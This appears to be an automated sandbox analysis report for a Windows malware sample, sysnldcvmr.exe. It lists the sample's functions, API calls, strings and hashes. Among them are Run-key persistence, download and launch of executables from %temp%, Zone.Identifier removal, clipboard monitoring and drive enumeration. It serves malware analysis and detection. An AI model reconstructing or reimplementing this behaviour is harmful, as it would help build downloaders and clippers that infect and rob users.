setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
bind.WS2_32(?,?,00000010), ref: 0040153B

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
String ID:
API String ID: 4174406920-0
Opcode ID: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
Opcode Fuzzy Hash: 7eae0560a4d2d7404a029b5e5367fdda332e0801075591d5afac2db090b1cb88
Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A

Function 0040CCF0 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040CD02
ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
GetTickCount.KERNEL32 ref: 0040CD74
Sleep.KERNEL32(00000001), ref: 0040CD94
GetTickCount.KERNEL32 ref: 0040CD9A

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CountTick$Sleepioctlsocketrecv
String ID:
API String ID: 107502007-0
Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95

Function 0040AA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(00000050), ref: 0040AAAD

Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D

socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18

Strings

www.update.microsoft.com, xrefs: 0040AAB7

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
String ID: www.update.microsoft.com
API String ID: 4063137541-1705189816
Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA

Function 0040BE80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5

Strings

Bz@, xrefs: 0040BE8F, 0040BEA5, 0040BEB1, 0040BE92, 0040BEA8, 0040BEB4

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: Bz@
API String ID: 1815803762-793989200
Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8

Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
bind.WS2_32(?,?,00000010), ref: 00401429

Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C

CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
String ID:
API String ID: 3943618503-0
Opcode ID: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
Opcode Fuzzy Hash: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A

Function 00407590 Relevance: 119.4, APIs: 50, Strings: 18, Instructions: 351
sleepfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000BB8), ref: 0040759E
CreateMutexA.KERNEL32(00000000,00000000,753f85d83d), ref: 004075AD
GetLastError.KERNEL32 ref: 004075B9
ExitProcess.KERNEL32 ref: 004075C8
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000105), ref: 00407602
PathFindFileNameW.SHLWAPI(C:\Windows\sysnldcvmr.exe), ref: 0040760D
wsprintfW.USER32 ref: 0040762A
DeleteFileW.KERNEL32(?), ref: 0040763A
ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
wcscmp.NTDLL ref: 00407663
ExitProcess.KERNEL32 ref: 00407682

Strings

%s\%s, xrefs: 00407790
%temp%, xrefs: 00407875
C:\Windows\sysnldcvmr.exe, xrefs: 004075FB, 00407608, 00407619, 004076C9, 004077AE, 004078AA
753f85d83d, xrefs: 004075A4
%s\tbtnds.dat, xrefs: 0040798E
C:\Users\user\tbtcmds.dat, xrefs: 004079AD
%s\%s, xrefs: 004076AB
%s:Zone.Identifier, xrefs: 0040761E
C:\Users\user\tbtnds.dat, xrefs: 00407993
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004076F9
%s\tbtcmds.dat, xrefs: 004079A8
%s\%s, xrefs: 0040788C
%windir%, xrefs: 00407694
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004077DE
Windows Settings, xrefs: 00407737, 0040781C, 00407918
%userprofile%, xrefs: 0040764C
sysnldcvmr.exe, xrefs: 00407657, 0040769F, 00407784, 00407880
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004078DA

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysnldcvmr.exe$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
API String ID: 4172876685-2147295483
Opcode ID: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
Opcode Fuzzy Hash: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D

Function 0040EAE0 Relevance: 73.7, APIs: 34, Strings: 8, Instructions: 227
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040EAE9
srand.MSVCRT ref: 0040EAF0
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
strlen.NTDLL ref: 0040EB1A
mbstowcs.NTDLL ref: 0040EB31
rand.MSVCRT ref: 0040EB39
rand.MSVCRT ref: 0040EB4D
wsprintfW.USER32 ref: 0040EB74
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
wsprintfW.USER32 ref: 0040EC74
DeleteFileW.KERNEL32(?), ref: 0040EC84
Sleep.KERNEL32(000007D0), ref: 0040ECA5
ExitProcess.KERNEL32 ref: 0040ECCD
DeleteFileW.KERNEL32(?), ref: 0040ECE3
CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
InternetCloseHandle.WININET(00000000), ref: 0040ECFD
InternetCloseHandle.WININET(00000000), ref: 0040ED0A
Sleep.KERNEL32(000003E8), ref: 0040ED15
rand.MSVCRT ref: 0040ED2A
Sleep.KERNEL32 ref: 0040ED3B
rand.MSVCRT ref: 0040ED41
rand.MSVCRT ref: 0040ED55
wsprintfW.USER32 ref: 0040ED7C
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
wsprintfW.USER32 ref: 0040EDB9
DeleteFileW.KERNEL32(?), ref: 0040EDC9
Sleep.KERNEL32(000007D0), ref: 0040EDEA
ExitProcess.KERNEL32 ref: 0040EE11
DeleteFileW.KERNEL32(?), ref: 0040EE20

Strings

%s\%d%d.exe, xrefs: 0040EB68
%temp%, xrefs: 0040EB0B
%s:Zone.Identifier, xrefs: 0040EC68
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EB85
.ou, xrefs: 0040EC5B, 0040ECF0
%s\%d%d.exe, xrefs: 0040ED70
]u@, xrefs: 0040EE06, 0040ECC2
%s:Zone.Identifier, xrefs: 0040EDAD

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.ou
API String ID: 3709769524-481826255
Opcode ID: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
Opcode Fuzzy Hash: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59

Function 0040AEA0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE

strcmp.NTDLL ref: 0040AED0

Strings

.192, xrefs: 0040AF5E
0.0.0.0, xrefs: 0040AEBE
127., xrefs: 0040AEE1
.127, xrefs: 0040AEFF
.10., xrefs: 0040AFDB
.192., xrefs: 0040AF7C
10., xrefs: 0040AF9F
.127., xrefs: 0040AF1D
.10, xrefs: 0040AFBD
192., xrefs: 0040AF40

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
Opcode Fuzzy Hash: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E

Function 00405970 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040597C
SetClipboardViewer.USER32(?), ref: 004059C8
SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
OpenClipboard.USER32(00000000), ref: 00405A77
GetClipboardData.USER32(00000000), ref: 00405A89
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
ChangeClipboardChain.USER32(?,?), ref: 00405B9E
DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
Opcode Fuzzy Hash: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69

Function 00406BC0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00406BCE
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000104), ref: 00406BE0

Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2

ExitThread.KERNEL32 ref: 00406D4A

Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
Part of subcall function 004063A0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
Part of subcall function 004063A0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E

Sleep.KERNEL32(00000BB8), ref: 00406D3D

Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
wsprintfW.USER32 ref: 00406CC2
wsprintfW.USER32 ref: 00406CE2
wsprintfW.USER32 ref: 00406D05

Strings

%s%s, xrefs: 00406CF9
(%dGB), xrefs: 00406CB6
Unnamed volume, xrefs: 00406CD6
C:\Windows\sysnldcvmr.exe, xrefs: 00406BD9, 00406BE6

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$C:\Windows\sysnldcvmr.exe$Unnamed volume
API String ID: 1650488544-3455140397
Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A

Function 00405880 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 00405898
GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
Sleep.KERNEL32(00000001), ref: 004058C4
GetTickCount.KERNEL32 ref: 004058CA
GetTickCount.KERNEL32 ref: 004058D3
wsprintfW.USER32 ref: 004058E6
RegisterClassExW.USER32(00000030), ref: 004058F3
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
TranslateMessage.USER32(?), ref: 00405945
DispatchMessageA.USER32(?), ref: 0040594F
ExitThread.KERNEL32 ref: 00405961

Strings

%x%X, xrefs: 004058DA
0, xrefs: 004058A0

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68

Function 0040E7C0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
memcmp.NTDLL ref: 0040E8DD
UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
CloseHandle.KERNEL32(00000000), ref: 0040E90A
CloseHandle.KERNEL32(000000FF), ref: 0040E914
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
CloseHandle.KERNEL32(000000FF), ref: 0040E962

Strings

.ou, xrefs: 0040E90A, 0040E914, 0040E962

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID: .ou
API String ID: 3902698870-3683031111
Opcode ID: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
Opcode Fuzzy Hash: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58

Function 0040B2C0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
CloseHandle.KERNEL32(00000000), ref: 0040B3E2
CloseHandle.KERNEL32(000000FF), ref: 0040B3EC

Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8

Strings

C:\Users\user\tbtnds.dat, xrefs: 0040B318
.ou, xrefs: 0040B3E2, 0040B3EC
Vz@, xrefs: 0040B33A, 0040B36E, 0040B3E8

Memory Dump Source

Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

